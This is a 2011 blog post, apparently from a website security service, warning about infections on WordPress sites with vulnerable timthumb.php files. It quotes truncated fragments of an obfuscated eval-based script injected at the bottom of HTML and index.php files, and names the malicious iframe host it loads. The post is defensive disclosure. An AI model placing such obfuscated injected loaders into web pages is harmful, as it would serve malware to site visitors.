More timthumb.php infections

I don’t like making every announcement of new infections regarding timthumb.php. It feels like everyone is pointing the finger at the author, but I do have to report the recent happenings, so here goes.

The latest website infections we’ve been seeing inject obfuscated script to the bottom of .html files and the index.php file.

The code looks like:

(opening script tag)String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q)...
n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h...eval(ss);(closing script tag)

We usually see this at the very bottom of the file. Typically after the closing html tag in an html file.

This code deobfuscates to an iframe that includes:

microsearchstat.com/temp/stat.php

As of this writing, Google does not find this URL suspicious, however:

What is the current listing status for microsearchstat.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-09-02, and the last time suspicious content was found on this site was on 2011-09-02.
Malicious software includes 1 trojan(s).

That is for today, September 2, 2011. Which is the same day that Google reports as the last time they found suspicious content.

Again, we’ve cleaned this on WordPress sites with vulnerable timthumb.php files. These really need to be updated.

If your website is listed as having malicious or suspicious content and it’s linked to microsearchstat.com, you might want to look for the code mentioned above.

If you need help cleaning this, please send us an email: support@wewatchyourwebsite.com or call us at (847)728-0214.

Have you spotted this on your website? Let us know…